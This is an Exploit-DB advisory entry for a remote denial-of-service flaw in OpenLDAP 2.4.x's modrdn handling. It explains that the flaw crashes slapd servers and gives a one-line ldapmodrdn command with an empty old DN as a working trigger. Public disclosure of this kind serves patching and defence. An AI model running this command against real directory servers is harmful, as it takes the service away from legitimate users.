OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service

EDB-ID:

35445




Platform:

Linux

Date:

2011-01-03


source: https://www.securityfocus.com/bid/46831/info

OpenLDAP is prone to a remote denial-of-service vulnerability that affects the 'modify relative distinguished name' (modrdn) command.

Attackers can exploit this issue to deny service to legitimate users by crashing affected 'slapd' servers. 

ldapmodrdn -x -H ldap://ldapserver -r '' o=test